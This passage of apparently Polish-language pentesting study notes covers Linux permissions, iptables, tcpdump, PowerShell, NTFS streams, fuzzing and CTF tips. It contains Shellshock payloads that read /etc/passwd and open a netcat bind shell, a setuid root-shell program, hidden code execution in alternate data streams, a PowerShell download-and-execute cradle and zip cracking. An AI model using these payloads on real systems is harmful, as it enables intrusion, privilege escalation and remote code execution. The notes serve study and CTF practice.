- `g` - group - `o` - other np: `chmod u+x plik.sh` - uprawnienia wykonywania dla użytkownika ## 8.2 SUID  #### Ustawianie suid za pomocą chmod - `chmod u+s file.txt` - `chmod 4750 file.txt` ### Wyszukiwanie wszystkich plików z ustawionym SUID `find / -perm +4000` :::info Wielka litera `S` przy uprawnieniach oznacza że plik nie ma uprawnień do wykonywania, np: - SUID bez uprawnień do wykonywania ``` chmod u+s file1.txt ls -l -rwSrwxr-x 1 surendra surendra 0 Dec 27 11:24 file1.txt ``` - SUID z uprawnieniami do wykonywania ``` chmod u+x file1.txt ls -l -rwsrwxr-x 1 surendra surendra 0 Dec 5 11:24 file1.txt ``` ::: ## 8.3 iptables #### Commands - `-L _chain_` lists the rules in the chain. This is commonly used with the `-n` option to disable name resolution (for example, `iptables -n -L INPUT` will display the rules related to incoming packets). - `-N _chain_` creates a new chain. You can create new chains for a number of purposes, including testing a new network service or fending off a network attack. - `-X _chain_` deletes an empty and unused chain (for example, `iptables -X ddos-attack`). - `-A _chain_ _rule_` adds a rule at the end of the given chain. Remember that rules are processed from top to bottom so be sure to keep this in mind when adding rules. - `-I _chain_ _rule_num_ _rule_` inserts a rule before the rule number _rule_num_. As with the `-A` option, keep the processing order in mind when inserting new rules into a chain. - `-D _chain_ _rule_num_` (or `-D _chain_ _rule_`) deletes a rule in a chain; the first syntax identifies the rule to be deleted by its number (`iptables -L --line-numbers` will display these numbers), while the latter identifies it by its contents. - `-F _chain_` flushes a chain (deletes all its rules). For example, to delete all of the rules related to outgoing packets, you would run `iptables -F OUTPUT`. If no chain is mentioned, all the rules in the table are deleted. - `-P _chain_ _action_` defines the default action, or “policy” for a given chain; note that only standard chains can have such a policy. To drop all incoming traffic by default, you would run `iptables -P INPUT DROP`. #### Przykład 1 ``` # iptables -A INPUT -s 10.0.1.5 -j DROP # iptables -A INPUT -s 31.13.74.0/24 -j DROP # iptables -n -L INPUT Chain INPUT (policy ACCEPT) target prot opt source destination DROP all -- 10.0.1.5 0.0.0.0/0 DROP all -- 31.13.74.0/24 0.0.0.0/0 ``` #### Przykład 2 ``` # iptables -A INPUT -m state --state NEW -p tcp --dport 22 -j ACCEPT # iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT # iptables -A INPUT -m state --state NEW -p tcp --dport 143 -j ACCEPT # iptables -n -L INPUT Chain INPUT (policy ACCEPT) target prot opt source destination DROP all -- 10.0.1.5 0.0.0.0/0 DROP all -- 31.13.74.0/24 0.0.0.0/0 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:22 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:80 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 state NEW tcp dpt:143 ``` ## 8.4 Shellshock #### Exploiting Shellshock A tool to find and exploit servers vulnerable to Shellshock: ``` git clone https://github.com/nccgroup/shocker ``` ``` ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose ``` ##### cat file (view file contents) ``` echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 ``` ##### Shell Shock run bind shell ``` echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 ``` ##### Shell Shock reverse Shell ``` nc -l -p 443 ``` ##### HTTP Header - `curl -H "User-Agent: () { :; }; /bin/uname -a" http://<ip>` - `Content-type: () { :;}; echo; /bin/uname` ## 8.5 tcpdump [Więcej](https://danielmiessler.com/study/tcpdump/) Options ``` -i any : Listen on all interfaces just to see if you’re seeing any traffic. -i eth0 : Listen on the eth0 interface. -D : Show the list of available interfaces -l : Line-readable output (for viewing as you save, or sending to other commands) -A : Display output in ASCII. -n : Don’t resolve hostnames. -nn : Don’t resolve hostnames or port names. -q : Be less verbose (more quiet) with your output. -t : Give human-readable timestamp output. -tttt : Give maximally human-readable timestamp output. -X : Show the packet’s contents in both hex and ASCII. -XX : Same as -X, but also shows the ethernet header. -v, -vv, -vvv : Increase the amount of packet information you get back. -c : Only get x number of packets and then stop. -s : Define the snaplength (size) of the capture in bytes. Use -s0 to get everything, unless you are intentionally capturing less. -S : Print absolute sequence numbers. -e : Get the ethernet header as well. -q : Show less protocol information. -E : Decrypt IPSEC traffic by providing an encryption key. ``` ## 8.6 rootbash - bash z podwyższonymi uprawnieniami ```clike= int main(void) { setgid(0); setuid(0); system("/bin/bash"); } ``` Kompilacja ``` gcc -o rootbash rootbash.c ``` :::info Skrypt uruchomi /bin/bash z ustawionym setgid/setuid na wartość 0, aka root :) ::: # 9. Windows ## 9.1 PowerShell `dir | get-Member` #### 9.1.1 Porównywanie ``` -eq -ne -gt -lt -ceq -like -match -cmatch ``` #### 9.1.2 Aliasy `Get-Alias ls` `Set-Alias` #### 9.1.3 Help `help <cmd>` `help <cmd> -online` #### 9.1.4 Sortowanie `Get-ChildItem | Sort-Object -Property length -desc` #### 9.1.5 Filtrowanie `where, ?` `dir | Where-Object {($_.length -gt 50000) -and ($_.Name -like "B*")}` #### 9.1.6 Foreach loop `1..10 | ForEach-Object {$_*2}` #### 9.1.7 Arrays `$strComputers = @("Srv1","Srv2","Srv3")` #### 9.1.8 Hash Tables `$empNumbers = @{"John Doe" = 112233;"Adam Kowalski" = 223344;}` `$empNumbers["John Doe"] = 334455` `$empNumbers.Remove("John Doe")` #### 9.1.9 Formatowanie wyjścia `$files | Format-Wide -Property length` `$files | Format-List -Property name,length,lastwritetime` `Get-Process | Format-Table -Property path,name -GroupBy company` `Get-Process | Sort-Object -Property company | Format-Table -Property path,name -GroupBy company` `$names | Sort-Object -property pcthispanic -Descending | Select-Object -First 1` #### 9.1.10 Zapisywanie wyjścia `Get-Process | Out-File C:\temp\process.txt` `Get-Process | ConvertTo-Html | Out-File C:\temp\process.txt` #### 9.1.11 Import danych `$proc = Import-Csv .\proc.csv` #### 9.1.12 Skrypty ```clike= function Add-Numbers { param([int]$num1, [int]$num2) return $num1 + $num2 } $result = Add-Numbers 1 2 $result += Add-Numbers 2 3 $result ``` ```clike= function Get-DirInfo($dir) { $results = Get-ChildItem $dir -Recurse | Measure-Object -Property length -Sum return [math]::Round(($results).sum/1MB,3) } Get-DirInfo C:\temp ``` ```clike= #parameters param([string]$dirg="C:\") #Functions function Get-DirInfo($dir) { $results = Get-ChildItem $dir -Recurse | Measure-Object -Property length -Sum return [math]::Round(($results).sum/1MB,3) } #main Get-DirInfo $dirg ``` ```clike= #Parameters #The script should take 2 arguments $source and $destination (for the source and destination folders). param([string]$source="c:\temp\source",[string]$destination="c:\temp\destination") #Functions #2) Functions #Create a function named CheckFolder that checks for the existence of a specific directory/folder that is passed #to it as a parameter. Also, include a switch parameter named create. If the directory/folder does not exist and #the create switch is specified, a new folder should be created using the name of the folder/directory that was #passed to the function. function Check-Folder([string]$path, [switch]$create){ $exists = Test-Path $path if(!$exists -and $create){ #create the directory because it doesn't exist mkdir $path | out-null $exists = Test-Path $path } return $exists } #Create a function named DisplayFolderStatistics to display folder statistics for a directory/path that is passed #to it. Output should include the name of the folder, number of files in the folder, and total size of all files in #that directory. function Display-FolderStats([string]$path){ $files = dir $path -Recurse | where {!$_.PSIsContainer} $totals = $files | Measure-Object -Property length -sum $stats = "" | Select path,count,size $stats.path = $path $stats.count = $totals.count $stats.size = [math]::round($totals.sum/1MB,2) return $stats } #3) Main processing #a) Test for existence of the source folder (using the CheckFolder function). $sourceexists = Check-Folder $source if (!$sourceexists){ Write-Host "The source directory is not found. Script can not continue." Exit } #b) Test for the existence of the destination folder; create it if it is not found (using the CheckFolder function #with the –create switch).Write-Host "Testing Destination Directory - $destination" $destinationexists = Check-Folder $destination -create if (!$destinationexists){ Write-Host "The destination directory is not found. Script can not continue." Exit } #c) Copy each file to the appropriate destination. #get all the files that need to be copied $files = dir $source -Recurse | where {!$_.PSIsContainer} #c-i) Display a message when copying a file. The message should list where the file is being #moved from and where it is being moved to. foreach ($file in $files){ $ext = $file.Extension.Replace(".","") $extdestdir = "$destination\$ext" #check to see if the folder exists, if not create it $extdestdirexists = Check-Folder $extdestdir -create if (!$extdestdirexists){ Write-Host "The destination directory ($extdestdir) can't be created." Exit } #copy file copy $file.fullname $extdestdir } #d) Display each target folder name with the file count and byte count for each folder. $dirs = dir $destination | where {$_.PSIsContainer} $allstats = @() foreach($dir in $dirs){ $allstats += Display-FolderStats $dir.FullName } $allstats | sort size -Descending ``` ## 9.2 Pass-the-Hash ## 9.3 NTFS ADS ``` > echo tresc > test.txt > more < test.txt > echo dodatkowa tresc > test.txt:dodatkowa.txt > more < test.txt:dodatkowa.txt ``` * dodawanie programów ``` > type C:\Windows\system3calc.exe > file.exe:calc.exe > start file.exe:calc.exe ``` * Można w ten sposób ukryty kod wykonać: ``` **Windows7 - uruchamianie ukrytego kodu vbs:** C:\ads>echo Wscript.Echo "uruchomiony" > test.txt:script.txt C:\ads>cscript //E:vbs test.txt:script.txt Host skryptów systemu Windows firmy Microsoft (R) wersja 5.8 Copyright (C) Microsoft Corporation 1996-2001. Wszelkie prawa zastrzeżone. uruchomiony ``` ## 9.4 SysInternals #### Live ``` \\live.sysinternals.com\tools ``` # 10. BufferOverflow ## Rejestry | Rejestr | Przeznaczenie | |---------|---------------| | EAX | Accumulator, używa się go do przechowywania wyników wielu operacji) | | EBX | Base Register (rejestr bazowy - służy do adresowania)| | ECX | Counter Register (rejestr licznikowy - służy jako licznik w pętli)| | EDX | Data Register (rejestr danych - umożliwia przekaz/odbiór danych z portów wejścia/wyjścia)| | ESI/EDI | Source Index (rejestr źródłowy - trzyma źródło łańcucha danych) / Destination Index (rejestr przeznaczenia - przetrzymuje informacje o miejscu docelowym łańcucha danych)| | ESP | Stack Pointer (przechowuje wskaźnik wierzchołka stosu) | | EBP | Base Pointer (rejestr bazowy - służy do adresowania)| | EIP | wskaźnik adresowy na aktualnie wykonywaną instrukcję. Za jego pomocą procesor realizuje m.in. skoki, pętle, przejścia do podprogramów | ## Przykład BO  ## 10.1 Fuzzing ### AFL `CC` - dla języka C `CXX` - dla języka C++ np. `CC=afl-gcc ./configure; make` `CXX=afl-g++ ./configure; make` Once finished, you want to tune up your configuration, the following command will instruct the system to output coredumps as files instead of sending them to a specific crash handler app. ``` # echo core > /proc/sys/kernel/core_pattern ``` ``` # mkdir in # mkdir out # afl-fuzz -i in/ -o out/ ./plik -a @@ ``` :::info W katalogu `input` znajduje się legitny plik. AFL uzywa go jako base template. ::: # 11. HTB ## Klucz `curl -X "POST" "https://www.hackthebox.eu/api/invite/generate" | jq -r .data.code | base64 --decode ` ## PowerShell IEX download ``` powershell "IEX(New-Object Net.WebClient).downloadString ('http://<ip>:<port>/exploit.html')" ``` # 12. CRYPTO * [quipqiup.com](https://quipqiup.com/) # 13. CRACK ## ZIP `$ fcrackzip -v -D -u -p /usr/share/dict/words secret.zip`